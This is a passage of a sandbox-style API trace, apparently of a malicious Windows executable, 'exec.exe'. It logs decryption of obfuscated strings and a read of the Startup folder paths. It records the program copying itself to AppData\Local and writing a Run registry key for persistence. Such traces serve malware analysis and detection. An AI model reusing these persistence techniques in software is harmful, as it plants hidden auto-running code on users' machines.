returned 1 [0109.076] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5530, pdwDataLen=0x43f5c8 | out: pbData=0x1db5530, pdwDataLen=0x43f5c8) returned 1 [0109.076] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.076] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5530 | out: hHeap=0x1db0000) returned 1 [0109.076] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x1db1730, nSize=0x1d | out: lpDst="") returned 0x2c [0109.076] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0109.076] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db1730, Size=0x72) returned 0x1db54e8 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x72) returned 0x1db5568 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db55e8 [0109.076] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f614 | out: phKey=0x43f614*=0x29bf60) returned 1 [0109.077] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5fc, dwFlags=0x0) returned 1 [0109.077] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db55e8, pdwDataLen=0x43f5c8 | out: pbData=0x1db55e8, pdwDataLen=0x43f5c8) returned 1 [0109.077] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.077] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db55e8 | out: hHeap=0x1db0000) returned 1 [0109.077] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x1db54e8, nSize=0x39 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2c [0109.077] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5568 | out: hHeap=0x1db0000) returned 1 [0109.077] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1708 | out: hHeap=0x1db0000) returned 1 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1708 [0109.077] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f63c | out: phKey=0x43f63c*=0x29bf60) returned 1 [0109.077] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f624, dwFlags=0x0) returned 1 [0109.077] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1708, pdwDataLen=0x43f5f0 | out: pbData=0x1db1708, pdwDataLen=0x43f5f0) returned 1 [0109.077] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x3e) returned 0x1db5568 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x3e) returned 0x1db55b0 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db55f8 [0109.077] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f614 | out: phKey=0x43f614*=0x29bf60) returned 1 [0109.077] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5fc, dwFlags=0x0) returned 1 [0109.077] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db55f8, pdwDataLen=0x43f5c8 | out: pbData=0x1db55f8, pdwDataLen=0x43f5c8) returned 1 [0109.077] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x10) returned 0x1db1750 [0109.077] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f590 | out: phkResult=0x43f590*=0x22c) returned 0x0 [0109.077] RegQueryValueExW (in: hKey=0x22c, lpValueName="Startup", lpReserved=0x0, lpType=0x43f58c, lpData=0x1db55b0, lpcbData=0x43f594*=0x3e | out: lpType=0x43f58c*=0x2, lpData=0x1db55b0*=0xc4, lpcbData=0x43f594*=0x98) returned 0xea [0109.077] RegCloseKey (hKey=0x22c) returned 0x0 [0109.077] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1750 | out: hHeap=0x1db0000) returned 1 [0109.077] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db55f8 | out: hHeap=0x1db0000) returned 1 [0109.077] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db55b0 | out: hHeap=0x1db0000) returned 1 [0109.077] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5568, Size=0x7a) returned 0x1db5568 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x7a) returned 0x1db55f0 [0109.077] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5678 [0109.077] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f610 | out: phKey=0x43f610*=0x29bf60) returned 1 [0109.077] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5f8, dwFlags=0x0) returned 1 [0109.077] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5678, pdwDataLen=0x43f5c4 | out: pbData=0x1db5678, pdwDataLen=0x43f5c4) returned 1 [0109.077] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.078] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x10) returned 0x1db1750 [0109.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f58c | out: phkResult=0x43f58c*=0x22c) returned 0x0 [0109.078] RegQueryValueExW (in: hKey=0x22c, lpValueName="Startup", lpReserved=0x0, lpType=0x43f588, lpData=0x1db55f0, lpcbData=0x43f590*=0x7a | out: lpType=0x43f588*=0x2, lpData=0x1db55f0*=0xc4, lpcbData=0x43f590*=0x98) returned 0xea [0109.078] RegCloseKey (hKey=0x22c) returned 0x0 [0109.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1750 | out: hHeap=0x1db0000) returned 1 [0109.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5678 | out: hHeap=0x1db0000) returned 1 [0109.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db55f0 | out: hHeap=0x1db0000) returned 1 [0109.078] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5568, Size=0xf2) returned 0x1db5568 [0109.078] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xf2) returned 0x1db5668 [0109.078] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5768 [0109.078] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f610 | out: phKey=0x43f610*=0x29bf60) returned 1 [0109.078] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5f8, dwFlags=0x0) returned 1 [0109.078] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5768, pdwDataLen=0x43f5c4 | out: pbData=0x1db5768, pdwDataLen=0x43f5c4) returned 1 [0109.078] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.078] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x10) returned 0x1db1750 [0109.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f58c | out: phkResult=0x43f58c*=0x22c) returned 0x0 [0109.078] RegQueryValueExW (in: hKey=0x22c, lpValueName="Startup", lpReserved=0x0, lpType=0x43f588, lpData=0x1db5668, lpcbData=0x43f590*=0xf2 | out: lpType=0x43f588*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x43f590*=0x98) returned 0x0 [0109.078] RegCloseKey (hKey=0x22c) returned 0x0 [0109.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1750 | out: hHeap=0x1db0000) returned 1 [0109.078] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1750 [0109.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f58c | out: phkResult=0x43f58c*=0x22c) returned 0x0 [0109.078] RegQueryValueExW (in: hKey=0x22c, lpValueName="Common Startup", lpReserved=0x0, lpType=0x43f588, lpData=0x1db5700, lpcbData=0x43f590*=0x5a | out: lpType=0x43f588*=0x0, lpData=0x1db5700*=0x73, lpcbData=0x43f590*=0x5a) returned 0x2 [0109.079] RegCloseKey (hKey=0x22c) returned 0x0 [0109.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f5a0 | out: phkResult=0x43f5a0*=0x22c) returned 0x0 [0109.079] RegQueryValueExW (in: hKey=0x22c, lpValueName="Common Startup", lpReserved=0x0, lpType=0x43f59c, lpData=0x1db5700, lpcbData=0x43f5a4*=0x5a | out: lpType=0x43f59c*=0x2, lpData=0x1db5700*=0x73, lpcbData=0x43f5a4*=0x78) returned 0xea [0109.079] RegCloseKey (hKey=0x22c) returned 0x0 [0109.079] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1750 | out: hHeap=0x1db0000) returned 1 [0109.079] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5768 | out: hHeap=0x1db0000) returned 1 [0109.079] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5668 | out: hHeap=0x1db0000) returned 1 [0109.079] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5568, Size=0x1e2) returned 0x1db5568 [0109.079] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e2) returned 0x1db5758 [0109.079] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5948 [0109.079] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f610 | out: phKey=0x43f610*=0x29bf60) returned 1 [0109.079] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5f8, dwFlags=0x0) returned 1 [0109.079] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5948, pdwDataLen=0x43f5c4 | out: pbData=0x1db5948, pdwDataLen=0x43f5c4) returned 1 [0109.079] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.079] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x10) returned 0x1db1750 [0109.079] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f58c | out: phkResult=0x43f58c*=0x22c) returned 0x0 [0109.079] RegQueryValueExW (in: hKey=0x22c, lpValueName="Startup", lpReserved=0x0, lpType=0x43f588, lpData=0x1db5758, lpcbData=0x43f590*=0x1e2 | out: lpType=0x43f588*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x43f590*=0x98) returned 0x0 [0109.079] RegCloseKey (hKey=0x22c) returned 0x0 [0109.079] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1750 | out: hHeap=0x1db0000) returned 1 [0109.079] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1750 [0109.079] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f58c | out: phkResult=0x43f58c*=0x22c) returned 0x0 [0109.079] RegQueryValueExW (in: hKey=0x22c, lpValueName="Common Startup", lpReserved=0x0, lpType=0x43f588, lpData=0x1db57f0, lpcbData=0x43f590*=0x14a | out: lpType=0x43f588*=0x0, lpData=0x1db57f0*=0x73, lpcbData=0x43f590*=0x14a) returned 0x2 [0109.079] RegCloseKey (hKey=0x22c) returned 0x0 [0109.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x43f5a0 | out: phkResult=0x43f5a0*=0x22c) returned 0x0 [0109.080] RegQueryValueExW (in: hKey=0x22c, lpValueName="Common Startup", lpReserved=0x0, lpType=0x43f59c, lpData=0x1db57f0, lpcbData=0x43f5a4*=0x14a | out: lpType=0x43f59c*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x43f5a4*=0x78) returned 0x0 [0109.080] RegCloseKey (hKey=0x22c) returned 0x0 [0109.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1750 | out: hHeap=0x1db0000) returned 1 [0109.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5948 | out: hHeap=0x1db0000) returned 1 [0109.080] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x1db5568, nSize=0xf1 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x99 [0109.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5758 | out: hHeap=0x1db0000) returned 1 [0109.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1708 | out: hHeap=0x1db0000) returned 1 [0109.080] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5758 [0109.080] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5970 [0109.080] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5b88 [0109.080] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5da0 [0109.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1db5758, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0109.080] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5fb8 [0109.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1db5fb8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0109.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5fb8 | out: hHeap=0x1db0000) returned 1 [0109.080] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db5fb8 [0109.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1db5fb8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0109.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5fb8 | out: hHeap=0x1db0000) returned 1 [0109.080] CopyFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe"), bFailIfExists=0) returned 1 [0109.087] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x43f6a4 | out: phkResult=0x43f6a4*=0x0) returned 0x5 [0109.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x43f690 | out: phkResult=0x43f690*=0x230) returned 0x0 [0109.087] RegSetValueExW (in: hKey=0x230, lpValueName="exec", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", cbData=0x68 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe") returned 0x0 [0109.087] RegCloseKey (hKey=0x230) returned 0x0 [0109.087] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x134) returned 0x1db5fb8 [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.087] GetLastError () returned 0x0 [0109.087] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.088] GetLastError () returned 0x0 [0109.088] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] SetLastError (dwErrCode=0x0) [0109.089] GetLastError () returned 0x0 [0109.089] CopyFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), lpNewFileName="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 0 [0109.090] CopyFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 0 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5fb8 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5758 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5970 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5b88 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5da0 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0109.090] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5568 | out: hHeap=0x1db0000) returned 1 [0109.090] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db16a0 [0109.090] CryptImportKey (in: hProv=0x254d70, pbData=0x43f60c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f674 | out: phKey=0x43f674*=0x29bf60) returned 1 [0109.090] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f65c, dwFlags=0x0) returned 1 [0109.090] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x43f628 | out: pbData=0x1db16a0, pdwDataLen=0x43f628) returned 1 [0109.090] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db16c8 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16f0 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0109.091] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f64c | out: phKey=0x43f64c*=0x29bf60) returned 1 [0109.091] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f634, dwFlags=0x0) returned 1 [0109.091] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x43f600 | out: pbData=0x1db54e8, pdwDataLen=0x43f600) returned 1 [0109.091] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.091] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0109.091] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db16c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0109.091] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16f0 | out: hHeap=0x1db0000) returned 1 [0109.091] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0109.091] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x43f6b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x43f6b4*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.091] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16c8 | out: hHeap=0x1db0000) returned 1 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db16a0 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db16d0 [0109.091] CryptImportKey (in: hProv=0x254d70, pbData=0x43f51c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f584 | out: phKey=0x43f584*=0x29bf60) returned 1 [0109.091] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f56c, dwFlags=0x0) returned 1 [0109.091] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x43f538 | out: pbData=0x1db16d0, pdwDataLen=0x43f538) returned 1 [0109.091] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db16e8 [0109.091] CryptImportKey (in: hProv=0x254d70, pbData=0x43f514, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f57c | out: phKey=0x43f57c*=0x29bf60) returned 1 [0109.091] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f564, dwFlags=0x0) returned 1 [0109.091] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16e8, pdwDataLen=0x43f530 | out: pbData=0x1db16e8, pdwDataLen=0x43f530) returned 1 [0109.091] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.091] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db1700 [0109.092] CryptImportKey (in: hProv=0x254d70, pbData=0x43f50c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f574 | out: phKey=0x43f574*=0x29bf60) returned 1 [0109.092] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f55c, dwFlags=0x0) returned 1 [0109.092] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1700, pdwDataLen=0x43f528 | out: pbData=0x1db1700, pdwDataLen=0x43f528) returned 1 [0109.092] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db1718 [0109.092] CryptImportKey (in: hProv=0x254d70, pbData=0x43f504, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f56c | out: phKey=0x43f56c*=0x29bf60) returned 1 [0109.092] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f554, dwFlags=0x0) returned 1 [0109.092] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1718, pdwDataLen=0x43f520 | out: pbData=0x1db1718, pdwDataLen=0x43f520) returned 1 [0109.092] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.092] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0109.092] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f564 | out: phKey=0x43f564*=0x29bf60) returned 1 [0109.092] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f54c, dwFlags=0x0) returned 1 [0109.092] CryptDecrypt (in: 